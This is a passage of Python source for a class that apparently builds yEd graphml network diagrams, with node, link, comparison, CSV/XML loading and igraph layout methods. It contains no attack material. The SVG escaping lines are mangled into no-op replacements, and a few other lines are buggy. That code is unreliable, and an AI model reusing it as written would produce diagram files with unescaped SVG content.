* ``description`` (str) string to save as node ``description`` attribute
* ``url`` (str) url string to save as node ``url`` attribute
* ``width`` (int) node width in pixels
* ``height`` (int) node height in pixels
* ``x_pos`` (int) node position on x axis
* ``y_pos`` (int) node position on y axis
* ``attributes`` (dict) dictionary of yEd graphml tag names and attributes
Attributes dictionary keys will be used as xml tag names and values
dictionary will be used as xml tag attributes, example::
{
'DropShadow': { 'color': '#B3A691', 'offsetX': '5', 'offsetY': '5'}
}
"""
# check duplicates
if self._node_exists(
id, label=label, attributes=attributes, description=description
):
return
# sanitize pic:
if not pic.endswith(".svg"):
pic += ".svg"
pic_file_path = pic_path + pic
# check if file exists
if not os.path.exists(pic_file_path):
log.error(
"add_svg_node: failed to load svg, '{}' - file not found".format(
pic_file_path
)
)
return
self.nodes_ids[id] = id
# load svg pic resource into graph resources section if not yet loaded:
if not pic_file_path in self.svg_pics_dict:
resource_id = hashlib.md5(pic_file_path.encode()).hexdigest()
with open(pic_file_path, "r") as pic_file:
pic_xml = pic_file.read()
# extract pic width and height that can be containedin viewBox attribute as well:
pic_element = ET.fromstring(pic_xml.encode("utf8"))
if pic_element.attrib.get("viewBox"):
_, _, pic_width, pic_height = pic_element.attrib.get(
"viewBox"
).split(" ")
elif pic_element.find(".//*/{http://www.w3.org/2000/svg}svg"):
_, _, pic_width, pic_height = (
pic_element.find(".//*/{http://www.w3.org/2000/svg}svg")
.attrib.get("viewBox")
.split(" ")
)
else:
pic_width = pic_element.get("width", width)
pic_height = pic_element.get("height", height)
del pic_element
pic_width = float(pic_width)
pic_height = float(pic_height)
# scale width and height down to 100px if size more than 100px
if max(pic_width, pic_height) > 100:
factor = max(pic_width, pic_height) / 100
pic_width = pic_width / factor
pic_height = pic_height / factor
# modify pic_xml for inclusion into resource element
pic_xml = (
pic_xml.replace("&", "&")
.replace("<", "<")
.replace(">", ">")
.replace("'", "'")
)
# save pic id and it's params into sgv_pics_dict dictionary:
self.svg_pics_dict[pic_file_path] = {
"refid": resource_id,
"height": pic_height,
"width": pic_width,
}
# create resource element:
svg_resource_element = ET.fromstring(
self.resource_xml.format(id=resource_id, text_data=pic_xml)
)
self.drawing.find(
"./_default_ns_:data/y:Resources", self.namespaces
).append(svg_resource_element)
del svg_resource_element
params = self.svg_pics_dict[pic_file_path]
# create svg_node element:
svg_node = ET.fromstring(
self.svg_node_xml.format(
attrib_id=self.y_attr["node"]["nodegraphics"],
id=id,
refid=params["refid"],
height=params["height"],
width=params["width"],
x=x_pos,
y=y_pos,
)
)
# add label and description data to the node:
if label == "":
label = id
svg_node.find("./_default_ns_:data/y:SVGNode", self.namespaces).append(
self._create_label_element(
self.node_label_xml, label, modelName="sandwich", modelPosition="n"
)
)
if description != "":
svg_node.append(
self._create_data_element(
id=self.y_attr["node"]["description"], text=description
)
)
if url != "":
svg_node.append(
self._create_data_element(id=self.y_attr["node"]["url"], text=url)
)
# save original id in node custom attribute:
svg_node.append(
self._create_data_element(
id=self.y_attr["node"]["nmetadata"], text=json_dumps({"id": id})
)
)
# add node to the graph and delete node_element:
self.graph_root.append(svg_node)
def _add_group_node(
self,
id, # string, name of the node
label="", # string, label at the center of the node
top_label="", # string, label at the top of the node
bottom_label="", # string, label at the bottom of the node
attributes={}, # dictionary, contains node attributes
description="", # string, data to add in node description
url="", # string, data to add tonode URL
):
"""
NOT IMPLEMENTED.
Method to add group node to join nodes in cluster.
"""
# check for node duplicates:
if self._node_exists(
id,
label=label,
top_label=top_label,
bottom_label=bottom_label,
attributes=attributes,
description=description,
):
return
self.nodes_ids[id] = id
# create node element:
node = ET.fromstring(
group_node_xml.format(attrib_id=self.y_attr["node"]["nodegraphics"])
)
self.nodes_ids[id] = id
node.set("id", id)
# set id for groupnode graph:
node.find("./_default_ns_:graph", self.namespaces).attrib["id"] = "{}:".format(
id
)
# add labels
GroupNode = node.find(
"./_default_ns_:data/y:ProxyAutoBoundsNode/y:Realizers/y:GroupNode",
self.namespaces,
)
if label == "":
label = id
labels = {"c": label, "t": top_label, "b": bottom_label}
for position, label_text in labels.items():
if label_text.strip():
GroupNode.append(
self._create_label_element(
self.node_label_xml, label_text, modelPosition=position
)
)
# add description data
if description != "":
node.append(
self._create_data_element(
id=self.y_attr["node"]["description"], text=description
)
)
if url != "":
node.append(
self._create_data_element(id=self.y_attr["node"]["url"], text=url)
)
# save original id in node custom attribute:
node.append(
self._create_data_element(
id=self.y_attr["node"]["nmetadata"], text=json_dumps({"id": id}),
)
)
# set attributes for the node:
self.set_attributes(GroupNode, attributes)
self.graph_root.append(node)
def add_node(self, id, **kwargs):
"""
Convenience method to add node, by calling one of node add methods following
these rules:
* If ``pic`` attribute in kwargs, ``add_svg_node`` is called
* If ``group`` kwargs attribute equal to `True`, ``_add_group_node`` called
* ``add_shape_node`` called otherwise
**Parameters**
* ``id`` (str) mandatory, unique node identifier, usually equal to node name
"""
kwargs["id"] = id
if kwargs.get("group", "").strip() == True:
self._add_group_node(**kwargs)
elif kwargs.get("pic", "").strip():
self.add_svg_node(**kwargs)
else:
self.add_shape_node(**kwargs)
def _link_exists(self, id, edge_tup):
"""method, used to check dublicate edges
"""
if id in self.edges_ids:
if self.link_duplicates == "log":
log.error(
"_link_exists: edge '{}' already added to graph".format(
",".join(edge_tup)
)
)
elif self.link_duplicates == "skip":
pass
return True
self.edges_ids.update({id: id})
def add_link(
self,
source,
target,
label="",
src_label="",
trgt_label="",
description="",
attributes={},
url="",
):
"""
Method to add link between nodes.
**Parameters**
* ``source`` (str) mandatory, id of source node
* ``target`` (str) mandatory, id of target node
* ``label`` (str) label at the center of the edge, by default equal to id attribute
* ``src_label`` (str) label to display at the source end of the edge
* ``trgt_label`` (str) label to display at target end of the edge
* ``description`` (str) string to save as link ``description`` attribute
* ``url`` (str) string to save as link ``url`` attribute
* ``attributes`` (dict) dictionary of yEd graphml tag names and attributes
Attributes dictionary keys will be used as xml tag names and values
dictionary will be used as xml tag attributes, example::
{
"LineStyle": {"color": "#00FF00", "width": "1.0"},
"EdgeLabel": {"textColor": "#00FF00"},
}
.. note:: If source or target nodes does not exists, they will be automatically
created
"""
# check type of source and target attribute
source_node_dict = source.copy() if isinstance(source, dict) else {"id": source}
source = source_node_dict.pop("id")
target_node_dict = target.copy() if isinstance(target, dict) else {"id": target}
target = target_node_dict.pop("id")
# check if target and source nodes exist, add it if not,
# self._node_exists method will update node
# if self.node_duplicates set to update, by default its set to skip
if not self._node_exists(source, **source_node_dict):
self.add_node(id=source, **source_node_dict)
source_id = self.nodes_ids[source]
if not self._node_exists(target, **target_node_dict):
self.add_node(id=target, **target_node_dict)
target_id = self.nodes_ids[target]
# create edge id
edge_tup = tuple(sorted([label, src_label, trgt_label, source, target]))
edge_id = hashlib.md5(",".join(edge_tup).encode()).hexdigest()
# check if edge already exists
if self._link_exists(edge_id, edge_tup):
return
# create edge element
edge = ET.fromstring(
self.edge_xml.format(
attrib_id=self.y_attr["edge"]["edgegraphics"],
id=edge_id,
source=source_id,
target=target_id,
)
)
# fill labels and description:
PolyLineEdge = edge.find("./_default_ns_:data/y:PolyLineEdge", self.namespaces)
labels = {"center": label, "source": src_label, "target": trgt_label}
for position, label_text in labels.items():
if label_text.strip():
PolyLineEdge.append(
self._create_label_element(
self.edge_label_xml,
label_text,
path="y:PreferredPlacementDescriptor",
placement=position,
)
)
if description != "":
edge.append(
self._create_data_element(
id=self.y_attr["edge"]["description"], text=description
)
)
if url != "":
edge.append(
self._create_data_element(id=self.y_attr["edge"]["url"], text=url)
)
# save source and target original nodes' id in edge emetadata attribute:
edge.append(
self._create_data_element(
id=self.y_attr["edge"]["emetadata"],
text=json_dumps({"sid": source, "tid": target, "id": edge_id}),
)
)
# fill in edge attributes:
self.set_attributes(PolyLineEdge, attributes)
# append edge element to graph:
self.graph_root.append(edge)
def from_dict(self, data):
"""
Method to build graph from dictionary.
**Parameters**
* ``data`` (dict) dictionary with nodes and link/edges details.
Example ``data`` dictionary::
sample_graph = {
'nodes': [
{
'id': 'a',
'pic': 'router',
'label': 'R1'
},
{
'id': 'b',
'label': 'somelabel',
'bottom_label':'botlabel',
'top_label':'toplabel',
'description': 'some node description'
},
{
'id': 'e',
'label': 'E'
}
],
'edges': [
{
'source': 'a',
'src_label': 'Gig0/0',
'label': 'DF',
'target': 'b',
'trgt_label': 'Gig0/1',
'description': 'vlans_trunked: 1,2,3'
}
],
'links': [
{
'source': 'a',
'target': 'e'
}
]
}
**Dictionary Content Rules**
* dictionary may contain ``nodes`` key with a list of nodes dictionaries
* each node dictionary must contain unique ``id`` attribute, other attributes are optional
* dictionary may contain ``edges`` or ``links`` key with a list of edges dictionaries
* each link dictionary must contain ``source`` and ``target`` attributes, other attributes are optional
"""
[self.add_node(**node) for node in data.get("nodes", [])]
[self.add_link(**link) for link in data.get("links", [])]
[self.add_link(**edge) for edge in data.get("edges", [])]
def from_list(self, data):
"""
Method to build graph from list.
**Parameters**
* ``data`` (list) list of link dictionaries,
Example ``data`` list::
sample_graph = [
{
'source': 'a',
'src_label': 'Gig0/0\\nUP',
'label': 'DF',
'target': 'b',
'trgt_label': 'Gig0/1',
'description': 'vlans_trunked: 1,2,3\\nstate: up'
},
{
'source': 'a',
'target': {
'id': 'e',
'label': 'somelabel',
'bottom_label':'botlabel',
'top_label':'toplabel',
'description': 'some node description'
}
}
}
]
**List Content Rules**
* each list item must have ``target`` and ``source`` attributes defined
* ``target``/``source`` attributes can be either a string or a dictionary
* dictionary ``target``/``source`` node must contain ``id`` attribute and
other supported node attributes
.. note::
By default yed_diagram object ``node_duplicates`` action set to 'skip' meaning that node will be added on first occurrence
and ignored after that. Set ``node_duplicates`` to 'update' if node with given id need to be updated by
later occurrences in the list.
"""
[self.add_link(**edge) for edge in data if edge]
def from_file(self, filename, file_load="xml"):
"""
Method to load data from file for processing. File format can
be yEd graphml (XML) or CSV
**Parameters**
* ``filename`` (str) OS path to file to load
* ``file_load`` (str) indicated the load of the file, supports ``xml``, ``csv``
"""
with open(filename, "r") as f:
if file_load.lower() == "xml":
self.from_xml(f.read())
elif file_load.lower() == "csv":
self.from_csv(data=csv_load)
def from_xml(self, text_data):
"""
Method to load yEd graphml XML formatted text for processing
**Parameters**
* ``text_data`` (str) text data to load
"""
self.drawing = ET.fromstring(text_data)
# load graph details
self.graph_root = self.drawing.find("./_default_ns_:graph", self.namespaces)
self._load_yattrs()
# load all nodes IDs and build mapping between nmetadata ID and ID generated by yED
nmetadata_id = self.y_attr["node"].get("nmetadata")
for node in self.graph_root.iterfind("./_default_ns_:node", self.namespaces):
node_data = node.find(
"./_default_ns_:data[@key='{}']".format(nmetadata_id), self.namespaces
)
node_data = json_loads(node_data.text)
self.nodes_ids[node_data["id"]] = node.attrib["id"]
# add all edges IDs to self.edges_ids list
emetadata_id = self.y_attr["edge"].get("emetadata")
for edge in self.graph_root.iterfind("./_default_ns_:edge", self.namespaces):
edge_data = edge.find(
"./_default_ns_:data[@key='{}']".format(emetadata_id), self.namespaces
)
edge_data = json_loads(edge_data.text)
source = edge_data.get("sid")
target = edge_data.get("tid")
edge_id = edge_data.get("id")
if not edge_id:
# get labels from edge and for. edge hash id
label, src_label, trgt_label = "", "", ""
for label_item in edge.iterfind(".//*/y:EdgeLabel", self.namespaces):
placement = label_item.attrib.get("preferredPlacement", "")
if "center" in placement:
label = label_item.text
elif "source" in placement:
src_label = label_item.text
elif "target" in placement:
trgt_label = label_item.text
# form edge hash
edge_tup = tuple(
sorted([source, target, label, src_label, trgt_label,])
)
edge_id = hashlib.md5(",".join(edge_tup).encode()).hexdigest()
self.edges_ids.update({edge_id: edge.attrib["id"]})
def from_csv(self, text_data):
"""
Method to build graph from CSV tables
**Parameters**
* ``text_data`` (str) CSV text with links or nodes details
This method supports loading CSV text data that contains nodes or links
information. If ``id`` in headers, ``from_dict`` method will be called for CSV
processing, ``from_list`` method will be used otherwise.
CSV data with nodes details should have headers matching add node methods
arguments and rules.
CSV data with links details should have headers matching ``add_link`` method
arguments and rules.
Sample CSV table with link details::
"source","src_label","label","target","trgt_label","description"
"a","Gig0/0","DF","b","Gig0/1","vlans_trunked: 1,2,3"
"b","Gig0/0","Copper","c","Gig0/2",
"b","Gig0/0","Copper","e","Gig0/2",
d,Gig0/21,FW,e,Gig0/23,
Sample CSV table with node details::
"id","pic","label","bottom_label","top_label","description"
a,router_1,"R1,2",,,
"b",,,"some","top_some",
"c",,"somelabel","botlabel","toplabel","some node description"
"d","firewall.svg","somelabel1",,,"some node description"
"e","router_2","R1",,,
"""
# import libs
from io import StringIO
import csv
# need to handle text data as file like object for csv reader to work
iostring = StringIO(newline="")
iostring.write(text_data)
iostring.seek(0)
# load csv data
dict_reader = csv.DictReader(iostring)
data_list = list(dict_reader)
# if id given - meaning it is nodes data
if data_list[0].get("id"):
self.from_dict({"nodes": data_list})
else:
self.from_list(data_list)
def dump_xml(self):
"""
Method to return current diagram XML text
"""
ret = ET.tostring(self.drawing, encoding="unicode")
ret = ret.replace("_default_ns_:", "").replace(":_default_ns_", "")
return ret
def dump_file(self, filename=None, folder="./Output/"):
"""
Method to save current diagram in .graphml file.
**Parameters**
* ``filename`` (str) name of the file to save diagram into
* ``folder`` (str) OS path to folder where to save diagram file
If no ``filename`` provided, timestamped format will be
used to produce filename, e.g.: ``Sun Jun 28 20-30-57 2020_output.graphml``
"""
import os
import time
# check output folder, if not exists, create it
if not os.path.exists(folder):
os.makedirs(folder)
# create file name
if not filename:
ctime = time.ctime().replace(":", "-")
filename = "{}_output.graphml".format(ctime)
# save file to disk
with open(folder + filename, "w") as outfile:
outfile.write(self.dump_xml())
def set_attributes(
self,
element, # lxml object to update attributes for
attributes={}, # dictionary of attributes to update
):
"""
Method to set attributes for XML element
**Parameters**
* ``element`` (object) xml etree element object to set attributes for
* ``attributes`` (dict) dictionary of yEd graphml tag names and attributes
Attributes dictionary keys will be used as xml tag names and values
dictionary will be used as xml tag attributes, example::
{
"LineStyle": {"color": "#00FF00", "width": "1.0"},
"EdgeLabel": {"textColor": "#00FF00"},
}
"""
children = list(element)
for tag, attribs in attributes.items():
tag_exists = False
for child in children:
if tag in child.tag:
child.attrib.update(attribs)
tag_exists = True
if tag_exists == False: # create tag element:
tag_elem = ET.fromstring(
'<y:{} xmlns:y="http://www.yworks.com/xml/graphml"/>'.format(tag)
)
tag_elem.attrib.update(attribs)
element.append(tag_elem)
def update_node(
self,
id,
label=None,
top_label=None,
bottom_label=None,
attributes={},
description=None,
width="",
height="",
):
"""
Method to update node details
**Parameters**
* ``id`` (str) mandatory, unique node identifier, usually equal to node name
* ``label`` (str) label at the center of the shape node or above SVG node
* ``top_label`` (str) label displayed at the top of the node
* ``bottom_label`` (str) label displayed at the bottom of the node
* ``description`` (str) string to save as node ``description`` attribute
* ``width`` (int) node width in pixels
* ``height`` (int) node height in pixels
* ``attributes`` (dict) dictionary of yEd graphml tag names and attributes
Attributes dictionary keys will be used as xml tag names and values
dictionary will be used as xml tag attributes, example::
{
'Shape' : {'type': 'roundrectangle'},
'DropShadow': { 'color': '#B3A691', 'offsetX': '5', 'offsetY': '5'}
}
This method will replace existing and add new labels to the node.
Existing description attribute will be replaced with new value.
Height and width will override existing values.
Attributes will replace existing values.
"""
# get node element:
node = self.graph_root.find(
"./_default_ns_:node[@id='{}']".format(self.nodes_ids.get(id, id)),
self.namespaces,
)
if node is None:
log.error(
"update_node, cannot find node with id - {}".format(
self.nodes_ids.get(id, id)
)
)
return
labels = {"c": label, "n": label, "t": top_label, "b": bottom_label}
# try to find shapenode element
node_elem = node.find("./_default_ns_:data/y:ShapeNode", self.namespaces)
# try to find svgnode element
if node_elem is None:
node_elem = node.find("./_default_ns_:data/y:SVGNode", self.namespaces)
labels = {"n": label}
if node_elem is None:
log.error(
"Failed to find ShapeNode or SVGNode for node with id: '{}'".format(
self.nodes_ids.get(id, id)
)
)
return
# update attributes, update description if it does not exists
self.set_attributes(node_elem, attributes)
if description:
description_elem = node_elem.find(
".//y:data[@key='{}']".format(self.y_attr["node"]["description"]),
self.namespaces,
)
if not description_elem:
node_elem.append(
self._create_data_element(
id=self.y_attr["node"]["description"], text=description
)
)
else:
description_elem.text = description
# iterate over existing labels
for label_elem in node_elem.iterfind(".//y:NodeLabel", self.namespaces):
position = label_elem.attrib.get("modelPosition")
if not labels.get(position) is None:
label_elem.text = labels.pop(position)
# add new labels
for label_position, label in labels.items():
if label is None:
continue
node_elem.append(
self._create_label_element(
self.node_label_xml, label, modelPosition=label_position
)
)
# set width and height
node_geometry_element = node.find(".//*/y:Geometry", self.namespaces)
if width:
node_geometry_element.set("width", str(width))
if height:
node_geometry_element.set("height", str(height))
def update_link(
self,
edge_id="",
label="",
src_label="",
trgt_label="",
source="",
target="",
new_label=None,
new_src_label=None,
new_trgt_label=None,
description="",
attributes={},
):
"""
Method to update edge/link details.
**Parameters**
* ``edge_id`` (str) md5 hash edge id, if not provided, will be generated
based on edge attributes
* ``label`` (str) existing edge label
* ``src_label`` (str) existing edge src_label
* ``trgt_label`` (str) existing edge tgt_label
* ``source`` (str) existing edge source node ID
* ``target`` (str) existing edge target node id
* ``new_label`` (str) new edge label
* ``new_src_label`` (str) new edge src_label
* ``new_trgt_label`` (str) new edge tgt_label
* ``description`` (str) new edge description
* ``attributes`` (str) dictionary of attributes to apply to edge element
Either of these must be provided to find edge element to update:
* ``edge_id`` MD5 hash or
* ``label, src_label, trgt_label, source, target`` attributes to calculate ``edge_id``
``edge_id`` calculated based on - ``label, src_label, trgt_label, source, target`` -
attributes following this algorithm:
1. Edge tuple produced: ``tuple(sorted([label, src_label, trgt_label, source, target]))``
2. MD5 hash derived from tuple: ``hashlib.md5(",".join(edge_tup).encode()).hexdigest()``
This method will replace existing and add new labels to the link.
Existing description attribute will be replaced with new value.
Attributes will replace existing values.
"""
# make new labels equal to existing labels if new label not provided
new_label = new_label if new_label != None else label
new_src_label = new_src_label if new_src_label != None else src_label
new_trgt_label = new_trgt_label if new_trgt_label != None else trgt_label
# generate existing and new edge ID
edge_tup = tuple(sorted([label, src_label, trgt_label, source, target]))
new_edge_tup = tuple(
sorted([new_label, new_src_label, new_trgt_label, source, target])
)
edge_id = (
hashlib.md5(",".join(edge_tup).encode()).hexdigest()
if not edge_id
else edge_id
)
new_edge_id = (
hashlib.md5(",".join(new_edge_tup).encode()).hexdigest()
if not edge_id
else edge_id
)
if edge_id in self.edges_ids:
self.edges_ids.update({new_edge_id: self.edges_ids.pop(edge_id)})
elif edge_id:
self.edges_ids[edge_id] = edge_id
# find edge element
edge = self.graph_root.find(
'./_default_ns_:edge[@id="{}"]'.format(
self.edges_ids.get(edge_id, edge_id)
),
namespaces=self.namespaces,
)
PolyLineEdge = edge.find("./_default_ns_:data/y:PolyLineEdge", self.namespaces)
# update edge id
edge.attrib["id"] = self.edges_ids[new_edge_id]
# update description
if description:
description_elem = edge.find(
".//y:data[@key='{}']".format(self.y_attr["edge"]["description"]),
self.namespaces,
)
if description_elem is None:
edge.append(
self._create_data_element(
id=self.y_attr["edge"]["description"], text=description
)
)
else:
description_elem.text = description
# update labels
labels = {
"center": new_label,
"source": new_src_label,
"target": new_trgt_label,
}
# iterate over existing labels
for label_elem in PolyLineEdge.iterfind(".//y:EdgeLabel", self.namespaces):
label_placement_elem = label_elem.find(
".//y:PreferredPlacementDescriptor", self.namespaces
)
if not label_placement_elem is None:
position = label_placement_elem.get("placement")
if labels.get(position, "").strip():
label_elem.text = labels.pop(position)
# add new labels
for position, label_text in labels.items():
if not label_text.strip():
continue
PolyLineEdge.append(
self._create_label_element(
self.edge_label_xml,
label_text,
path="y:PreferredPlacementDescriptor",
placement=position,
)
)
# update attributes
self.set_attributes(PolyLineEdge, attributes)
def compare(
self,
data, # N2G dictionary data to compare against
missing_nodes={ # dict, attributes to apply to missing nodes
"BorderStyle": {"color": "#C0C0C0", "width": "2.0"},
"NodeLabel": {"textColor": "#C0C0C0"},
},
new_nodes={ # dict, attributes to apply to new nodes
"BorderStyle": {"color": "#00FF00", "width": "5.0"},
"NodeLabel": {"textColor": "#00FF00"},
},
missing_links={ # dict, attributes to apply to missing edges
"LineStyle": {"color": "#C0C0C0", "width": "1.0"},
"EdgeLabel": {"textColor": "#C0C0C0"},
},
new_links={ # dict, attributes to apply to new edges
"LineStyle": {"color": "#00FF00", "width": "1.0"},
"EdgeLabel": {"textColor": "#00FF00"},
},
):
"""
Method to combine two graphs - existing and new - and produce resulting
graph following these rules:
* nodes and links present in new graph but not in existing graph considered
as new and will be updated with ``new_nodes`` and ``new_links`` attributes by
default highlighting them in green
* nodes and links missing from new graph but present in existing graph considered
as missing and will be updated with ``missing_nodes`` and ``missing_links`` attributes
by default highlighting them in gray
* nodes and links present in both graphs will remain unchanged
**Parameters**
* ``data`` (dict) dictionary containing new graph data, dictionary format should be
the same as for ``from_dict`` method.
* ``missing_nodes`` (dict) dictionary with attributes to apply to missing nodes
* ``new_nodes`` (dict) dictionary with attributes to apply to new nodes
* ``missing_links`` (dict) dictionary with attributes to apply to missing links
* ``new_links`` (dict) dictionary with attributes to apply to new links
**Sample usage**::
from N2G import yed_diagram
diagram = yed_diagram()
new_graph = {
'nodes': [
{'id': 'a', 'pic': 'router_round', 'label': 'R1' }
],
'edges': [
{'source': 'f', 'src_label': 'Gig0/21', 'label': 'DF', 'target': 'b'}
]
}
diagram.from_file("./old_graph.graphml")
diagram.compare(new_graph)
diagram.dump_file(filename="compared_graph.graphml")
"""
if isinstance(data, dict):
# find new nodes
existing_nodes = []
new_nodes_list = []
for node in data["nodes"]:
node.setdefault("attributes", {})
if not node["id"] in self.nodes_ids:
node["attributes"].update(new_nodes)
self.add_node(**node)
new_nodes_list.append(node["id"])
else:
existing_nodes.append(node["id"])
# find missing nodes
for id in self.nodes_ids.keys():
if not id in existing_nodes and not id in new_nodes_list:
self.update_node(id=id, attributes=missing_nodes)
# find edges connected to missing nodes
for edge in self.graph_root.iterfind(
"./_default_ns_:edge[@source='{}']".format(id), self.namespaces
):
self.update_link(
edge_id=edge.get("id"), attributes=missing_links
)
for edge in self.graph_root.iterfind(
"./_default_ns_:edge[@source='{}']".format(
self.nodes_ids.get(id, "")
),
self.namespaces,
):
self.update_link(
edge_id=edge.get("id"), attributes=missing_links
)
for edge in self.graph_root.iterfind(
"./_default_ns_:edge[@target='{}']".format(id), self.namespaces
):
self.update_link(
edge_id=edge.get("id"), attributes=missing_links
)
for edge in self.graph_root.iterfind(
"./_default_ns_:edge[@target='{}']".format(
self.nodes_ids.get(id, "")
),
self.namespaces,
):
self.update_link(
edge_id=edge.get("id"), attributes=missing_links
)
# find new edges:
existing_edges = []
new_links_list = []
# combine all edges under "links" key
data.setdefault("links", [])
data["links"] += data.pop("edges") if data.get("edges") else []
for edge in data["links"]:
edge.setdefault("attributes", {})
# create edge id
edge_tup = tuple(
sorted(
[
edge["source"],
edge["target"],
edge.get("label", ""),
edge.get("src_label", ""),
edge.get("trgt_label", ""),
]
)
)
edge_id = hashlib.md5(",".join(edge_tup).encode()).hexdigest()
# add new edge
if not edge_id in self.edges_ids:
edge["attributes"].update(new_links)
self.add_link(**edge)
new_links_list.append(edge_id)
else:
existing_edges.append(edge_id)
# find missing edges:
for id in self.edges_ids.keys():
if not id in existing_edges and not id in new_links_list:
self.update_link(edge_id=id, attributes=missing_links)
def layout(self, algo="kk", width=1360, height=864, **kwargs):
"""
Method to calculate graph layout using Python
`igraph <https://igraph.org/python/doc/tutorial/tutorial.html#layout-algorithms>`_
library
**Parameters**
* ``algo`` (str) name of layout algorithm to use, default is 'kk'. Reference
`Layout algorithms` table below for valid algo names
* ``width`` (int) width in pixels to fit layout in
* ``height`` (int) height in pixels to fit layout in
* ``kwargs`` any additional kwargs to pass to igraph ``Graph.layout`` method
**Layout algorithms**
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
| algo name | description |
+=================================+================================================================================================================+
| circle, circular | Deterministic layout that places the vertices on a circle |
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
| drl | The Distributed Recursive Layout algorithm for large graphs |
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
| fr | Fruchterman-Reingold force-directed algorithm |
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
| fr3d, fr_3d | Fruchterman-Reingold force-directed algorithm in three dimensions |
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
| grid_fr | Fruchterman-Reingold force-directed algorithm with grid heuristics for large graphs |
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
| kk | Kamada-Kawai force-directed algorithm |
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
| kk3d, kk_3d | Kamada-Kawai force-directed algorithm in three dimensions |
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
| large, lgl, large_graph | The Large Graph Layout algorithm for large graphs |
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
| random | Places the vertices completely randomly |
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
| random_3d | Places the vertices completely randomly in 3D |
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
| rt, tree | Reingold-Tilford tree layout, useful for (almost) tree-like graphs |
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
| rt_circular, tree | Reingold-Tilford tree layout with a polar coordinate post-transformation, useful for (almost) tree-like graphs |
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
| sphere, spherical, circular_3d | Deterministic layout that places the vertices evenly on the surface of a sphere |
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
"""
try:
from igraph import Graph as ig
except ImportError:
raise SystemExit(
"Failed to import igraph, install - pip install python-igraph"
)
igraph_graph = ig()
# iterate over diagrams and layout elements
nodes_iterator = self.graph_root.iterfind(
"./_default_ns_:node", self.namespaces
)
links_iterator = self.graph_root.iterfind(
"./_default_ns_:edge", self.namespaces
)
# populate igraph with nodes
for item in nodes_iterator:
igraph_graph.add_vertex(name=item.attrib["id"])
# populate igraph with edges
for item in links_iterator:
igraph_graph.add_edge(
source=item.attrib["source"], target=item.attrib["target"]
)
# calculate layout
layout = igraph_graph.layout(layout=algo, **kwargs)
# scale layout to diagram size
layout.fit_into(bbox=(width, height))
# add coordinates from layout to diagram nodes
for index, coord_item in enumerate(layout.coords):
x_coord, y_coord = coord_item
node_id = igraph_graph.vs[index].attributes()["name"]
node = self.graph_root.find(
"./_default_ns_:node[@id='{}']".format(node_id), self.namespaces
)
node_geometry_element = node.find(".//*/y:Geometry", self.namespaces)
node_geometry_element.set("x", str(round(x_coord)))
node_geometry_element.set("y", str(round(y_coord)))
def delete_node(self, id=None, ids=[]):
"""
Method to delete node by its id. Bulk delete operation
supported by providing list of node ids to delete.
**Parameters**
* ``id`` (str) id of single node to delete
* ``ids`` (list) list of node ids to delete
"""
ids = ids + [id] if id else ids
for node_id in ids:
node_id_to_pop = str(node_id)
# try to find using provided id
node = self.graph_root.find(
"./_default_ns_:node[@id='{}']".format(node_id), self.namespaces
)
if node is None:
# try to find using yed generated id
node_id = self.nodes_ids.get(node_id, "")
node = self.graph_root.find(
"./_default_ns_:node[@id='{}']".format(node_id), self.namespaces
)
if not node is None:
self.graph_root.remove(node)
self.nodes_ids.pop(node_id_to_pop)
# delete edges
for edge in self.graph_root.iterfind(
"./_default_ns_:edge[@source='{}']".format(node_id), self.namespaces
):
edge_id_to_pop = edge.get("id", "")
if not edge_id_to_pop in self.edges_ids:
edge_id_to_pop = None
# need to iterate over edges_ids values to find respective key to pop
for k, v in self.edges_ids.items():
if v == edge.get("id"):
edge_id_to_pop = k
break
if edge_id_to_pop:
self.edges_ids.pop(edge_id_to_pop)
self.graph_root.remove(edge)
for edge in self.graph_root.iterfind(
"./_default_ns_:edge[@target='{}']".format(node_id), self.namespaces
):
edge_id_to_pop = edge.get("id", "")
if not edge_id_to_pop in self.edges_ids:
edge_id_to_pop = None
# need to iterate over edges_ids values to find respective key to pop
for k, v in self.edges_ids.items():
if v == edge.get("id"):
edge_id_to_pop = k
break
if edge_id_to_pop:
self.edges_ids.pop(edge_id_to_pop)
self.graph_root.remove(edge)
def delete_link(
self,
id=None,
ids=[],
label="",
src_label="",
trgt_label="",
source="",
target="",
):
"""
Method to delete link by its id. Bulk delete operation
supported by providing list of link ids to delete.
If link ``id`` or ``ids`` not provided, id calculated based on - ``label, src_label,
trgt_label, source, target`` - attributes using this algorithm:
1. Edge tuple produced: ``tuple(sorted([label, src_label, trgt_label, source, target]))``
2. MD5 hash derived from tuple: ``hashlib.md5(",".join(edge_tup).encode()).hexdigest()``
**Parameters**
* ``id`` (str) id of single link to delete
* ``ids`` (list) list of link ids to delete
* ``label`` (str) link label to calculate id of single link to delete
* ``src_label`` (str) link source label to calculate id of single link to delete
* ``trgt_label`` (str) link target label to calculate id of single link to delete
* ``source`` (str) link source to calculate id of single link to delete
* ``target`` (str) link target to calculate id of single link to delete
"""
if not id and not ids:
# create edge id
edge_tup = tuple(sorted([source, target, label, src_label, trgt_label,]))
ids.append(hashlib.md5(",".join(edge_tup).encode()).hexdigest())
else:
ids = ids + [id] if id else ids
for edge_id in ids:
edge_id_to_pop = str(edge_id)
edge = self.graph_root.find(
"./_default_ns_:edge[@id='{}']".format(edge_id), self.namespaces
)
if edge is None:
# try to find using yed generated id
edge_id = self.edges_ids.get(edge_id, "")
edge = self.graph_root.find(
"./_default_ns_:edge[@id='{}']".format(edge_id), self.namespaces
)
if not edge is None:
self.graph_root.remove(edge)
# pop edge id from edges_ids dict
if not edge_id_to_pop in self.edges_ids:
edge_id_to_pop = None
# need to iterate over edges_ids values to find respective key to pop
for k, v in self.edges_ids.items():
if v == edge_id:
edge_id_to_pop = k
break
if edge_id_to_pop:
self.edges_ids.pop(edge_id_to_pop)
def _find_node(
self,
id=None,
label=None,
top_label=None,
bottom_label=None,
